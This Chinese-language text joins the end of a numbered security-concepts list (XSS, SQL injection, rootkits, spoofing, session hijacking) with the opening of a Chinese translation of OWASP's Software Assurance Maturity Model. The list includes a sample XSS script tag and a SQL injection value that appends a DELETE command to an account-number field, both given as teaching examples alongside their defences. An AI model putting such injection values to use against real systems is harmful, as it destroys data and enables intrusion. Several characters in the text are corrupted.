正使用的时候,他的权限是不对的。比如在这个时间中,他的权限被管 理员修改了,或者攻击者把自己的ID改成这个ID。这本质上是一种race condition问题,Check就是赋权的时候,用户被赋权后,有可能发生了变 化,Use时已经突破了预期的权限。 32、后门:后门是没有被记录到文档中的命令和接口,本来是在开发和 调试过程中,方便程序开发人员调试用的。但在生产中仍然留下后门, 一是可以在故障时方便排错,二是偷看敏感数据。除了开发商做的后门, 许多恶意代码创建后门,允许远程访问受感染的系统。如果后门未被记 录到文档中,就很麻烦!因为开发人员可能会离开公司,那么他们就可 以利用后门访问系统或搞破坏。 33、攻击者权限ᨀ升:最常见方法之一是通过使用 rootkit。rootkit 可以 从互联网上免费获得,能够利用各种操作系统的已知漏洞。攻击者经常 通过使用密码攻击或社会工程学攻击获得普通的系统用户账号,然后使 用 rootkit 将他们的访问权限ᨀ高到 root(或系统管理员)级别。所以 要经常打补丁。 34、跨站脚本(XSS)的原理:当 Web 应用程序包含“反射”式输入类 型时,就容易出现跨站脚本(XSS)攻击。例如Web 应用程序只包含一个 请求输入name的文本框,然后返回页面“Hello, name’,如果攻击者输入 下面的文本:Mike<SCRIPT>alert('hello')</SCRIPT>。XSS 攻击的关键在于能 够将表单输入嵌入一个链接。恶意攻击者可以创建一个链接,他也确实 是First Bank Web的站点,也能通过有效的SSL认证,但这个站点随后会执 行恶意攻击者在表单输入中嵌入的脚本。 34、XSS最典型的一个场景:通过XSS脚本让用户点击,然后让用户把自 己的cookie,以及其中的sessionID发给攻击者的服务器,然后攻击者就可 以获取受害者会话了。持久性XSS通常是存储在数据库或其他任何地方 (如论坛、留言板、意见簿等),攻击者的论坛帖子中有恶意JavaScript 脚本,其他用户浏览这些帖子时,它们的浏览器会执行攻击者的 JavaScript。 35、防御跨站脚本攻击:必须执行输入验证。最基本的做法是:一定不 允许用户在可反射输入字段中输入<SCRIPT>标记。这种做法并不能完全 解决问题,总有一些巧妙的方法来绕过。最佳的解决方案应当是:首先 确定许可的输入类型,然后通过验证实际输入来确保其与指定模式匹配。 例如,一个允许用户输入年龄的文本框,那么应当只接受一到三位数字 作为输入。 36、SQL注入攻击:比如一段业务逻辑在后台是:SELECT * FROM transactions WHERE account_ number = ' <number> ‘,<number>是客户在 Web 表单中输入的账户号码。如果应用程序并不执行输入验证,用户完 全可以插入自己的SQL代码。 例如用户的账户号码为 145249, 那么可以输入下面的语句: 145249'; DELETE * FROM transactions WHERE 'a'='a 应用程序组合起来后,删掉了所有记录! 37、SQL注入防御方法:输入验证;限制用户特权;使用存储过程。 限制用户特权:Web服务器使用的数据库账户应当具有尽可能最小的 权限集。如果账户只具有SELECT权限,那么DELETE命令就会失败。 使用存储过程:使用存储过程,SQL语句驻留在数据库服务器上并且仅 仅可由数据库管理员修改。调用存储过程的 Web 应用程序可以传递参数, 但不改变 SQL 语句的基本结构。 38、侦查攻击(Reconnaissance attck):IP探测、端口扫᧿、漏洞扫᧿。 Nmap 工具是一个用来对 IP 和端口进行扫᧿的最常见工具,漏洞扫᧿有 许多比较流行的工具,包括 Nessus、OpenVAS、Qualys、Core Impact 和 Nexpose。 39、垃圾搜寻(dumpster diving):文件不要轻易扔进垃圾箱,比如,特 殊部门员工的生日列表可能被用于社工攻击;随便丢弃的U盘可能有重要 数据;著名的社会工程师Kevin Mitnick曾经被允许使用公司的简报作为攻 击的关键组件。他很快注意到包含新员工列表的部分,并且意识到这些 人是最合适的受害者:这些新员工在接到来自“高层”对机密信息的电 话请求时都会十分热情。 40、针对垃圾搜索的防御:为主要部门购买碎纸机。将垃圾保存在一个 安全的地方,直到收拾垃圾的人到来。这些小细节的培养需要经历漫长 的过程。 41、伪装攻击(Masquerading attack):主要有:IP欺骗、会话劫持。 42、你会惊奇地发现 IP 欺骗非常有效。系统管理员应该在每个网络边界 进行过滤,至少符合下列标准: 具有内部源 IP 地址的包不能从外部进入网络。 具有外部源 IP 地址的包不能从内部离开网络。 具有私有 IP 地址的包不能从任何一个方向通过路由器(除非被允许作 为内部配置的一部分)。 这三条简单的过滤规则能阻止绝大多数的 IP 欺骗攻击并大大ᨀ高网络 的安全性。 43、会话劫持攻击:攻击者中途拦截已授权用户与资源之间通信数据的 一部分,然后使用劫持技术接管这个会话并伪装成已授权用户的身份。 下面列出了一些常见的技术: 1.捕获受害者客户端与服务器之间身份认证的详细信息,并使用这些信 息伪装成客户端的身份; 2.中间人攻击:在客户端与服务器建立合法连接时作为中间人,然后断 开服务器与客户端的连接 3.使用没有正常关闭连接的用户的 cookie 数据访问 Web 应用程序。 防御:使用防重放身份认证技术、应用程序控制措施(如在一段适当 的时间内使 cookie 数据过期)。 结 束! 卫剑钒 2018.12.16 软件保证成熟度模型 将软件的安全融入到软件开发过程的指导手册 版本-1.0 2 欲获得最新版本和其他信息,请访问项目网页 http://www.opensamm.org 鸣谢 软件保证成熟度模型(SAMM)最初是由独立软件安全顾问:Pravir Chandra (chandra@owasp.org)开创、设计、并编写的。该文档初稿的创作由Fortify软件公司赞助。 该文档目前由Pravir Chandra所领导的OpenSAMM项目进行维护和更新。自SAMM最初版 本的发布以来,这个项目已成为开放Web应用安全项目(OWASP)的一部分。另外,感谢 那些列举在封底上给予我们支持的组织。 贡献者和审核者 如果没有那么多的审核人员和专家所给予的支持以及重要的反馈,这项工作就不会完 成。他们是(以姓的英文首字母排序): Fabio Arciniegas Brian Chess Matteo Meucci John Steven Matt Bartoldus Dinis Cruz Jeff Payne Chad Thunberg Sebastien Deleersnyder Justin Derry Gunnar Peterson Colin Watson Jonathan Carter Bart De Win Jeff Piper Jeff Williams Darren Challey James McGovern Andy Steingruebl 该中文版本参与人员 翻译及审核:王颉 (因笔者水平有限,欢迎大家指出存在的翻译错误。在以后发布的正式版本中,将修正指出 的错误。) 该中文版发布说明 本文档为“Software Assurance Maturity Model (Version 1.0)”的中文Alpha版发布。该版 本尽量提供原英文版本中的图片,并与原版本尽量保持相同的风格。存在的差异,尽情谅解。 这是一个OWASP的项目 开放Web应用安全项目(OWASP)是一个致力于改善应用软件安全的自由和开放的全 球性社区。我们的任务是使应用程序的安全能够“看得见”,所以使人和机构可以针对应用安 全的风险作出明智的决策。每个人都可以免费加入OWASP,我们所有的材料都基于免费和 开放的软件许可证。OWASP基金会是一家501(c)3非营利的慈善机构,以确保持续的可 用性和支持我们的工作。在线访问OWASP的网站http://www.owasp.org。 许可证 本文档的发布基于Creative Commons Attribution ShareAlike3.0许可 证。欲查看该许可证,请访问 http://creativecommons.org/licenses/by-sa/3.0/ 或将信件寄往 Creative Commons, 171 Second Street, Suite 300, San Francisco, California, 94105, USA。 3 执行摘要 软件保证成熟度模型(SAMM)是一个开放的框架,用以帮助组织制定并实 施针对组织所面临来自软件安全的特定风险的策略。由SAMM提供的资源可作用 于以下方面: ✦评估一个组织已有的软件安全实践; ✦建立一个迭代的权衡的软件安全保证计划; ✦证明安全保证计划带来的实质性改善; ✦定义并衡量组织中与安全相关的措施。 SAMM以灵活的方式定义,以使它可被大、中、小型组织使用于任何类型的 软件开发中。另外,此模型可适用于全组织范围内,从整个组织,或者甚至是一 个单一的项目。除了这些特点,SAMM还建立在以下原则: ✦一个组织的行为随着时间的推移而缓慢的改变——一个成功的软件安全 计划,应当详细说明每一个小的迭代步骤,以使能够提供有形的保证收益,并向 项目的长期目标前进。 ✦没有单一的方法可作用于所有的组织——一个软件安全框架必须是灵活 的,并允许组织可以根据他们的风险承受能力和他们开发和使用软件的方式,去 改进他们的选择。 ✦与安全措施相关的指导必须是规范的——所有建立和评估保证计划的步 骤应是简单的、明确的和可测量的。该模型还为普遍类型的组织提供了路线图模 版。 该模型的基础建立于软件开发的每个核心业务职能上,每个职能都有相应的 安全实践(见下图)。该模型为十二个安全实践中的每一个实践,都定义了三个 成熟等级。这些定义了一个组织可以进行的各种实践,以降低安全风险并加强软 件的保证。其他的细节还包括:衡量成功实践的性能表现、了解相关保证的益处、 评估人员和其他成本。 作为一个开放的项目,SAMM的内容应始终保持普遍代表性,并对所有可用 的资源免费提供使用。 4 目录 执行摘要 ..........................................................................................................................................3 理解模型 ..........................................................................................................................................6 业务功能 ..................................................................................................................................8 监管.................................................................................................................................10 构造.................................................................................................................................12 验证.................................................................................................................................14 部署.................................................................................................................................16 应用模型 ........................................................................................................................................18 使用成熟度等级.....................................................................................................................20 评估执行 ................................................................................................................................21 创建记分卡.............................................................................................................................26 建立保证计划.........................................................................................................................27 独立软件供应商.............................................................................................................28 在线服务提供商.............................................................................................................29 金融服务机构.................................................................................................................30 政府组织.........................................................................................................................31 安全实践 ........................................................................................................................................32 策略与指标.............................................................................................................................34 政策与遵守.............................................................................................................................38 教育与指导.............................................................................................................................42 威胁评估 ................................................................................................................................46 安全需求 ................................................................................................................................50 安全架构 ................................................................................................................................54 设计审核 ................................................................................................................................58 代码审核 ................................................................................................................................62 安全测试 ................................................................................................................................66 漏洞管理 ................................................................................................................................70 环境强化 ................................................................................................................................74 操作实现 ................................................................................................................................78 案例分析 ........................................................................................................................................82 VirtualWare...........................................................................................................................84 5 我需要… 评估现有软件的保证措施 建立一个组织的战略路线图 实施或执行安全活动 3 ✦执行摘要 3 ✦执行摘要 3 ✦执行摘要 8-9 ✦业务功能 8-9 ✦业务功能 8-9 ✦业务功能 10-11✦监管 10-11✦监管 10-11✦监管 12-13✦构造 12-13✦构造 12-13✦构造 14-15✦验证 14-15✦验证 14-15✦验证 16-17✦部署 16-17✦部署 16-17✦部署 21-25✦评估执行 20 ✦使用成熟度等级 20 ✦使用成熟度等级 26 ✦创建记分卡 27-31✦建立保证计划 34-37✧策略与指标 20 ✦使用成熟度等级 21-25✧评估执行 34-37✧策略与指标 34-37✧策略与指标 26 ✧创建记分卡 38-41✧政策与遵守 38-41✧政策与遵守 84-95✧VirtualWare 42-45✧教育与指导 42-45✧教育与指导 34-37✧策略与指标 46-49✧威胁评估 46-49✧威胁评估 38-41✧政策与遵守 50-53✧安全需求 50-53✧安全需求 42-45✧教育与指导 54-57✧安全架构 54-57✧安全架构 46-49✧威胁评估 58-61✧设计审核 58-61✧设计审核 50-53✧安全需求 62-65✧代码审核 62-65✧代码审核 54-57✧安全架构 66-69✧安全测试 66-69✧安全测试 58-61✧设计审核 70-73✧漏洞管理 70-73✧漏洞管理 62-65✧代码审核 74-77✧环境强化 74-77✧环境强化 66-69✧安全测试 21-25✧评估执行 78-81✧操作实现 70-73✧漏洞管理 26 ✧创建记分卡 27-31✧建立保证计划 74-77✧环境强化 27-31✧建立保证计划 84-95✧VirtualWare 78-81✧操作实现 84-95✧VirtualWare ✦ 细读 ✧ 略读 6 理解模型 从宏观的角度 7 SAMM建立在一个安全实践的集合上,这些安全实践关联到软件开发过程中 的核心业务。本节介绍这些业务功能以及每个相应的安全实践。先在对框架进行 总体介绍后,再对每个安全实践的成熟度等级进行简单地讨论,从而描绘出循序 渐进提高每个成熟度等级的总体图。 8 业务功能 在最高等级上,SAMM设置了四种关键业务功能。每种业务功能(在下文 中列出)是一组软件开发过程中具体细节的相关措施;换句话说,任何涉及了软 件开发的组织,必须在一定程度上实现每一个业务功能。 对于每一个业务功能,SAMM设置了三个安全措施。每个安全措施(在下 页中列出)是一个与安全相关的措施的领域,以为相关业务功能建立保证。所以, 从总体来说,这十二个安全措施都是改进软件开发业务功能的独立部分。 对于每一个安全实践,SAMM设置了三个成熟度等级作为目标。安全实践 中的每个等级,通过设置特定的活动和比先前等级更加严格的成功指标,设定了 一个更加复杂的目标。此外,每个安全实践可被独立改善,虽然相关的措施可导 致优化。 “监管”集中在于与一个组织如何管理所有软件开发活动相关的处理 过程和措施。更具体地说,这包括关注多小组参与的开发过程,以及在组 织级别上建立的业务处理过程。 更多信息请见第10页 “构造”关注于与一个组织对于开发项目中设置目标和创建软件相关 的处理过程和措施。在一般情况下,这将包括产品管理、需求收集、高级 别架构说明、详细设计和执行。 更多信息请见第12页 “确认”注重于与一个组织如何检查和测试软件开发过程中生产产物 相关的处理过程和措施。这通常包括质量保证工作,比如测试,但它也可 以包括其他审核和评估措施。 更多信息请见第14页 “部署”需要与一个组织如何管理所开发软件的发布相关的处理过程 和措施。这涉及到将产品运送给终端用户、将产品部署在内部或外部主机, 以及在运行环境中软件的正常运作。 更多信息请见第16页 9 监管 策略与指标包含了 软件保证计划的总 体战略方向和采集 一个组织安全态势 的测量处理过程和 措施。 政策与遵守包含了建 立一个贯穿一个组织 的安全和遵守控制,以 及审计框架,以实现正 在开发和运行软件的 安全保证。 教育与指导包含了通 过培训以及指导与独 立功能相关的安全议 题,来增强软件开发 过程中人员的安全知 识。 构造 威胁评估包含了准 确确定并特征化在 一个组织的软件中 潜在的攻击,以便更 好地了解风险,并为 风险管理带来便利。 安全需求包含了在软 件开发过程中,为在开 始阶段明确指定正确 的功能,敦促将与安全 相关的要求包含其中。 安全架构包含了促进 默认安全设计的措 施,和在软件开发过 程中对所有技术和构 架的控制,以支持设 计过程。 确认 设计审核包含了考 察设计过程中的产 物以确保提供足够 的安全机制,并坚持 一个组织的安全期 望。 代码审核包含了对一 个组织源代码的评估, 以帮助发现漏洞及相 关的弥补措施,以及建 立一个安全编码的最 低期望值。 安全测试包含了在运 行环境下对组织的软 件测试,以发现漏洞, 并为软件发布建立一 个最低标准。 部署 漏洞管理包含了为 管理内部和外部的 漏洞报告建立一个 一致的处理过程,以 限制漏洞地对外暴 露并采集数据以加 强软件安全计划。 环境强化包含了围绕 组织软件的操作环境, 执行相关地控制,以加 强对已部署应用程序 的安全态势。 操作实现包含了识别 并获得操作人员正确 配置、部署和运行软 件,而需要的与安全 相关的信息。 成熟度等级 注释 十二个安全实践中的每一个实践,都 设置了三个成熟度等级和一个隐含的为 零的起点。每个等级的细节在不同实践之 间有所不同,但它们普遍代表: 0 隐起点代表在实践中的措施尚未实现 1 对安全实践有了初步了解并有所专门 的提供 2 提高了安全实践的效率和(或)有效性 3 在一定规模上综合掌握了安全实践 在整篇文档中,以下标注的术语 被设定为在章节中设置的SAMM组 件。如果这些术语没有被标注使用, 它们应该在上下文的基础上被理解: ✦商务功能也被称为功能 ✦安全实践也被称为实践 ✦成熟度等级也被称为等级、目标 10 监管 安全实践描述 策略与指标 策略与指标实践(SM)专注于为软件安全保证计划在组织中建立一个框架。 这是以一种可衡量并和该组织实际业务风险相一致的方式,定义安全目标的最基 本步骤。 从简便的风险概况出发,组织经过一段时间地工作,开发出针对应用程序和 数据资产更先进的风险分类方法。通过对相关风险衡量的进一步了解,组织可以 调整其项目级的安全目标和开发粒度路线图,使其安全计划更有效。 在这一实践的更高等级上,组织利用许多内部和外部的数据,去采集安全计 划的度量指标和实质性的反馈信息。这允许在计划的级别上对成本支出和实现地 受益进行调整。 政策与遵守 政策与遵守实践(PC)专注于理解并符合外部法律和规章制度的要求,同 时也推动了内部安全标准,以确保遵守与该组织的业务目的一致。 为得到改善,该实践专注于项目级别的审计,收集有关该组织行为的信息, 以检查期望是否达到。通过从引入简便的常规审计开始,随着时间逐步深入,组 织以循序渐进的方式发生改变。 在一个复杂的形式下,提供这种实践需要理解全组织的内部标准和外部遵守 驱动因素,并同时保证尽量按计划准时检查项目团队,以确保没有项目在没有被 发现的情况下进行非期望的操作。 教育与指导 教育及指导实践(EG)专注于增加软件生命周期中涉及到人员的知识,以 及设计、开发和部署安全软件需要使用的资源。有了更好的信息,项目团队将能 够更好地主动识别并降低他们组织的特定安全风险。 为达到改善的目标,一个主要的方法是为员工提供培训:或是由专家指导的 讲义课程,或是基于计算机的上机课程。作为组织的改善进展,一个广泛的培训 由开发人员开始,并为组织中其他的角色提供培训,最后以基于角色的认证结束, 从而确保了培训的综合性。 除了培训,该实践也需要使与安全相关的信息成为指导,以作为工作人员的 参考信息。这个实践为建立组织安全实践的基准期望奠定了基础;并被允许一旦 采纳该指导,就将逐步改善。 11 监管 措施概观 策略与指标 更多信息请见第34页 SM1 SM2 SM3 目标 为组织内的软件 安全建立统一的 战略路线图。 衡量数据和软件 资产的相对价值, 并选择风险容忍 度。 使安全成本与相 关业务指标和资 产价值相一致。 措施 A. 评估整体业务 风险概况; B. 建立并维护保 证计划路线 图。 A. 根据业务风险 将数据和应用 程序分类; B. 建立并衡量每 个分组的安全 目的。 A. 引导周期性地 全行业成本比 较; B. 为以前的安全 成本收集度量 标准。 政策与遵守 更多信息请见第38页 PC1 PC2 PC3 目标 了解组织的相关 监管和遵守要求。 建立安全和遵守 的基准线,并了解 每个项目的风险。 要求遵守标准,并 衡量项目是否符 合全组织的政策 和标准。 措施 A. 确定并监控外 部的遵守驱动 因素; B. 建立并维护遵 守指导。 A. 为安全和遵守 建立政策和标 准; B. 建立项目审计 实践。 A. 为项目建立遵 守关卡; B. 为审计数据的 采集,采用解 决方案。 教育与指导 更多信息请见第42页 EG1 EG2 EG3 目标 为开发人员提供 关于以安全编程 和部署为主题的 资源。 为软件生命周期 中所有的人员提 供基于角色的安 全开发详细指导。 实施综合的安全 培训,并为员工进 行基本知识的认 证检验。 措施 A. 实施技术安全 意识的培训; B. 建立并维护技 术指导。 A. 实施针对特定 角色的应用程 序安全培训; B. 聘用安全指导 专家增强项目 团队。 A. 建立正式的应 用程序安全支 持门户网站; B. 建立基于角色 的考试或认证 制度。 12 构造 安全实践描述 威胁评估 威胁评估实践(TA)专注于在以开发软件的功能和运行环境的特点的基础 上,识别并了解项目级别的风险。根据每个项目的威胁和可能遭受到的攻击的详 细信息,组织通过对安全举措的优先次序,有效地做出更好的决策。另外,针对 风险地认同做出更明智的决定,从而能更好地与业务相协同。 通过从简单的威胁模型开始,并建立更加详细的威胁分析和加权方法,组织 随着时间的推移得到不断的改善。最终,复杂的组织将以一种把弥补方法和来自 外部实体的已通过风险紧密结合的方式,维护这类信息。这就为将来潜在的项目, 扩大了对安全问题的理解,同时对该组织目前抵抗已知威胁的表现保持密切关 注。 安全需求 安全需求实践(SR)注重于积极阐述软件关于安全的预期行为。通过在项 目层面的额外分析活动,根据软件的高级别业务目的,安全需求得到初步收集。 作为一个组织的进步,更先进的技术得到了使用,例如,访问控制的规范说明用 以发现在开发时没有发现的新安全需求。 在一种复杂的形式下,这种实践的提供也促使将组织的安全需求与供应商的 关系联系起来,然后审计所有的项目以确保它们遵守了安全需求规范的期望。 安全架构 安全架构实践(SA)注重于在默认的情况下,组织采取积极措施设计并开 发安全的软件。通过使用可重复使用的服务和组件,加强软件的设计过程,从而 大大降低来自软件开发过程中的的整体安全风险。 从软件框架的简单建议和安全设计原则的明确考虑出发,组织开始为安全功 能持续使用设计模式。此外,措施还鼓励项目团队对集中的安全服务和基础设施 提高使用率。 随着组织的发展,这种复杂实践得使用使得组织建立了参照平台,以涵盖其 建立的普遍类型软件。这些类型软件作为安全的框架,使开发人员可以以尽量低 的漏洞风险开发软件。 13 构造 措施概观 威胁评估 更多信息请见第46页 TA1 TA2 TA3 目标 确定并了解组织 和单个项目的高 级别威胁。 提高威胁评估的 准确性,并深入了 解每个项目的细 节。 将补偿控制与对 内部和第三方软 件的每个威胁具 体联系起来。 措施 A. 建立并维护特 定应用程序的 威胁模型; B. 根据软件架构 建立攻击者概 况。 A. 建立并维护每 个项目的滥用 用例模型; B. 为威胁的度量 采用一个权重 系统。 A. 明确评估来自 第三方组件的 风险; B. 用补偿控制详 细描述威胁模 型。 安全需求 更多信息请见第50页 SR1 SR2 SR3 目标 在软件需求分析 阶段明确地将安 全考虑在内。 根据业务逻辑和 已知风险增加安 全需求的深度。 为所有软件项目 和第三方的附属 项目强制要求安 全需求。 措施 A. 从业务功能推 导出安全需 求; B. 为需求评估安 全和遵守指 导。 A. 为资源和能力 建立一个访问 控制矩阵; B. 根据已知风险 指定安全需 求。 A. 将安全需求写 入供应商协议 中; B. 为安全需求扩 展审计计划。 安全架构 更多信息请见第54页 SA1 SA2 SA3 目标 将主动安全指导 的想法引入到软 件设计过程中。 将软件设计过程 引导向已知安全 服务和默认安全 设计。 正式控制软件设 计过程并验证安 全部件的使用。 措施 A. 维护推荐的软 件框架列表; B. 将安全原则明 确运用到设计 中。 A. 明确并促进安 全服务和基础 设施; B. 明确来自架构 的安全设计模 式。 A. 建立正式的参 照架构和平 台; B. 验证框架、模 式和平台的使 用。 14 验证 安全实践描述 设计审核 设计审核实践(DR)注重于针对与安全相关的问题评估软件设计和架构。 这使得组织能够在软件开发的早期检测到架构层面的问题,从而避免因安全问题 而导致以后由于重构所带来地潜在昂贵成本。 从简便的活动开始,了解有关架构的安全细节,组织进行了更加正式的检验 方式,以验证安全机制提供的完整性。在组织层面上,设计审核服务建立并提供 给利益相关者。 在一个复杂的形式下,该实践的提供涉及了数据级别的详细设计检验,以及 期待基准线的实施。为在发布以前,执行设计评估和审核检验。 代码审核 代码审核实践(CR)注重于在源代码级别上的软件检验,以发现安全漏洞。 代码级的漏洞一般在概念上简单易懂,但即便是开发人员也可以很容易地犯下错 误,使软件存在潜在的安全漏洞而被利用。 首先,组织使用简便的检查列表,并针对有效性,仅检查软件的最关键模块。 但是,组织使用自动化的技术,可以大大提高覆盖面和代码审核的效果。 该复杂实践的提供,将代码审核深深地整合到开发过程中,使项目团队能够 及早地发现问题。这也使组织能够更好地进行审计,并在发布以前为代码审核结 果设立期望。 安全测试 安全测试实践(ST)注重于在实时环境中检验软件,以发现安全问题。这 些测试活动通过在与预期运行环境相同的情况下运行,检查软件的保证用例,从 而避免那些不易发现的操作配置错误或业务逻辑中的错误再次发生。 从渗透测试和基于软件功能的高级别测试用例开始,组织使用自动化的安全 测试方法以覆盖更多的测试用例,以发现系统中可能存在的漏洞。 在一个高级的形式下,该实践的提供涉及了自定义的自动化测试,以建立一 个覆盖了详细的安全应用特定问题的测试机制。由于提供了在组织级别的其他可 视性,安全测试使组织在发布以前能为安全测试结果设置一个最低预期。 15 验证 措施概观 设计审核 更多信息请见第58页 DR1 DR2 DR3 目标 为软件设计提供 专门的审核,以确 保排除已知风险 的最低线。 根据安全的最佳 实践为软件设计 审核提供评估服 务。 需求评估并验证 已完成部分,以详 细了解保护机制。 措施 A. 确定软件攻击 层面; B. 根据已知安全 需求分析设 计。 A. 检查提供安全 机制的完整 性; B. 为项目团队部 署设计审核服 务。 A. 为敏感资源开 发数据流图; B. 为设计审核建 立发布关卡。 代码审核 更多信息请见第62页 CR1 CR2 CR3 目标 随机查找基本的 代码级漏洞和其 他高风险安全问 题。 通过自动化方式 在开发过程中使 代码审核更加准 确和有效。 必须进行全面的 代码审核过程,以 发现语言级别和 特定应用程序的 风险。 措施 A. 根据已知安全 需求建立审核 检查列表; B. 为高风险代码 执行定点审 核。 A. 使用自动化的 代码分析工 具; B. 将代码分析集 成到开发流程 当中。 A. 为特定应用程 序问题自定义 代码分析; B. 为代码审核建 立发布关卡。 安全测试 更多信息请见第66页 ST1 ST2 ST3 目标 根据编程和软件 需求,建立处理过 程以执行基本的 安全测试。 通过自动化使在 开发过程中的安 全测试更加完善 和有效。 在部署前要求进 行特定应用程序 的安全测试以确 保基本的安全。 措施 A. 从已知安全需 求推出测试用 例; B. 为软件发布执 行渗透测试。 A. 使用自动化的 安全测试工 具; B. 将安全测试整 合到开发过程 中。 A. 为特定应用程 序使用自动化 的安全测试; B. 为安全测试建 立发布关卡。 16 部署 安全实践描述 漏洞管理 漏洞管理实践(VM)注重于处理组织内漏洞报告和操作事故的处理过程。 通过这些处理过程,组织的项目将会对这些事件的发生保有一致的预期,并不断 提高效率,而不是混乱和无知的响应。 从在事件发生时对角色的简便分配开始,组织发展了一个更为正式的事件响 应处理过程,以确保对发生事件的可见性,并能对其跟踪。交流也有所改善,以 提高处理过程的整体理解。 在一个高级的形式下,漏洞管理包括了更加深入的事件分析和漏洞报告,以 收集到详细的指标和其他根本的原因信息,用以反馈到组织的下游行为中。 环境强化 环境硬化实践(EH)注重于为组织软件运行的环境建立保证。由于应用程 序的安全运行操作可因外部组件的问题而受到损坏,强化基础设施可直接提高软 件的整体安全状况。 开发团队通过简单的跟踪和分部,更好地了解关于操作环境的信息。另外, 组织通过使用可测量的方法,管理安全补丁的部署,并在操作环境中安装检测器, 为潜在的安全事件造成破坏以前产生早期警报。 作为组织的进步,通过部署保护工具,以添加防御层和安全网来减少当任意 漏洞被利用时所造成的破坏和损失。因此,操作环境得到了进一步的审核和强化。 操作实现 操作实现实践(OE)注重于从项目团队正在开发的软件收集关键的安全信 息,并将这些信息传递给软件的用户和操作人员。如果没有这些信息,即使是设 计最安全的软件,也会因为无法知道部署地点的重要安全特性和选择,而包含不 必要的风险。 从为用户和操作人员编写简便的文档以获得最有效的细节信息开始,组织逐 渐为每个版本的发布编写完整的操作安全指南。 在一个高级的形式下,操作实现也需要对每个项目团队进行组织级别的检 查,以确保根据预期获得信息并共享。 17 部署 措施概观 漏洞管理 更多信息请见第70页 VM1 VM2 VM3 目标 理解对于漏洞报 告或事件的高级 别计划。 为响应过程阐述 期望,以改善一致 性和交流。 在响应过程中为 积极规划提供反 馈,而改善分析和 数据收集。 措施 A. 为安全事件确 定联络点; B. 建立非正式安 全响应团队。 A. 建立一致的事 件响应流程; B. 采用安全事件 报告流程。 A. 为事件执行根 源分析; B. 收集每一事件 的度量指标。 环境强化 更多信息请见第74页 EH1 EH2 EH3 目标 了解应用程序和 软件组件的基本 操作环境。 通过强化操作环 境提高对应用程 序操作的信心。 以已知最佳实践 验证应用程序的 健康和操作环境 状态。 措施 A. 维护操作环境 说明; B. 确定并安装关 键的安全软件 升级和补丁。 A. 建立常规补丁 管理流程; B. 监控基准基础 架构配置状 态。 A. 确定并部署相 关操作的保护 工具; B. 为环境配置扩 展审计计划。 操作实现 更多信息请见第78页 OE1 OE2 OE3 目标 实现开发团队和 操作人员之间对 于与安全相关的 关键数据的沟通 交流。 通过提供详细的 步骤为持续的安 全操作提高期望。 针对完整性而对 安全信息和部件 检验进行强制宣 传。 措施 A. 为部署获得的 重要的安全信 息; B. 为典型的应用 程序警报记录 流程。 A. 创建每次发布 的变更管理流 程; B. 维护正式的操 作安全指南。 A. 为操作信息扩 展操作审计计 划; B. 对应用程序组 件执行代码签 名。 18 应用模型 使用方法 19 本节涵盖了 SAMM 的几个重要的实际应用。由于提供了模型本身的核心设 计,组织可以将 SAMM 作为基准来衡量其安全保证计划,并创建记分卡。通过 使用记分卡,组织能够证明通过迭代执行一项保证计划得到循序渐进改善。而最 重要的是,组织还可以使用 SAMM 路线图模板,以指导建立或改善一个安全保 证计划。 20 使用成熟度等级 十二个安全实践中的每一个实践都有三个成熟度等级。每个等级都有几个为 理解并实现相关等级而详细说明关键因素的部分。除此之外,这些详细规定的细 节内容使用了安全实践的定义,甚至可以在超出 SAMM 的使用范围情况下,建 立一个软件保证计划。 目标 目标是一段总体说明,以陈述实 现相关等级的保证目的。随着一个给 定实践等级得不断提高,就为软件开 发和部署的保证建立而言,目标也被 设定得更加复杂。 措施 措施是实现等级的核心条件。有 些措施是在全组织范围内进行的,有 些措施则对应了个别项目团队的行 动。在任何情况下,措施都获得了关 键的安全功能,并且组织也可以自由 得决定如何执行这些措施。 结果 结果体现了能力,并通过实现给 定的等级来提交获得的结果。在某些 情况下,结果被详细说明;而在其他 情况下,为体现能力得提高,做出更 多的定性声明。 成功指标 成功指标指明了衡量的样本,用 以检查组织是否执行在给定的等级。 组织可以选择是否执行数据的自我采 集和自我管理,但是必须采用相应推 荐的数据和阈值。 成本 成本是关于由组织为达到给定的 等级而产生开销的定性说明。虽然具 体的数值会因每个组织而不同,但这 些成本数据只是参考意见,以说明为 一个特定等级所进行的操作而带来的 成本开销。 人员 人员表示在给定的级别上,从人 力资源的角度来估算持续的开销。 ✦开发人员——负责软件的详细设计 和编码的人员; ✦架构师——负责高级别的设计工作 和大型系统工程技术的人员; ✦经理——负责日常管理开发人员的 人员; ✦QA 测试员——负责软件质量保证 测试和发布前检验的人员; ✦安全审计员——具备软件技术安全 知识的人员; ✦业务拥有者——负责对软件及其业 务需求做出关键决策的人员; ✦运营支持人员——负责提供客户支 持或直接技术支持的人员。 相关等级 相关等级是根据其组织的结构和 正在建立保证计划的进度,而决定的 一些潜在重叠的实践等级的参考。从 功能上看,如果有关等级也是一个目 标或已经被满足,那么这些等级都指 明了实践应用的协同效应或者应被优 化实施。 21 评估执行 按照已定义的安全实践来衡量一个组织,并建立其安全保证活动的整体状 况。对于了解目前组织内已设置的安全活动的广度,这类评估非常有用。此外, 它还使该组织能使用 SAMM 创建一个未来的发展路线,并以循序渐进的方式逐 步得到改善。 一项评估过程的执行,仅仅是确定组织目前正在执行情况的成熟度等级。根 据评估的原动力,通常会扩展对组织表现检验的方法。但是,有两种推荐的方法: ✦简便方法——每项实践的评估表都被评估分析,并为得到的回答评定分数。这 种评估方法通常对于一个正尝试将已有的保证计划与 SAMM 相匹配,以及仅希 望能立马了解其已达到保证计划等级大概情况的组织,是足够的。 ✦详细方法——完成评估表以后,执行额外的审计工作,以确保该组织每个实践 中规定的每一项措施都已执行。此外,因为每一个实践也规定了成功指标,相应 的数据应被收集,以确保该组织正在按照预期那样执行。 使用评估表给组织打分是很直接的。在回答完问题后,评估答案栏中的分数 以确定相关等级。所有问题的回答需为肯定的回答,并填写在相应实践标号的上 方和问题栏的右方。 已有保证计划的组成措施,有可能并非总处于成熟度等级的边界值,比如: 一个组织将一个给定的实践评估为等级 1,但可能实施了超出等级 1 的额外措施, 且并没有达到等级 2。对于这种情况,组织的得分应注明一个“+”号,以表示 额外的保证措施在该等级已获得。例如,一个组织为“操作实现”实践,执行了 所有等级 1 的措施,与此同时,一个等级 2 或等级 3 的措施的执行,则为等级 1 赋予了“1+”的得分。同样,一个组织为一个“安全实践”实践执行了所有的 措施,包括了一些超出 SAMM 范围的措施,因此得到一个“3+”的得分。 22 监管 评估表 策略与指标 是/不是 ✦是否已经有了一个软件安全保证计划? 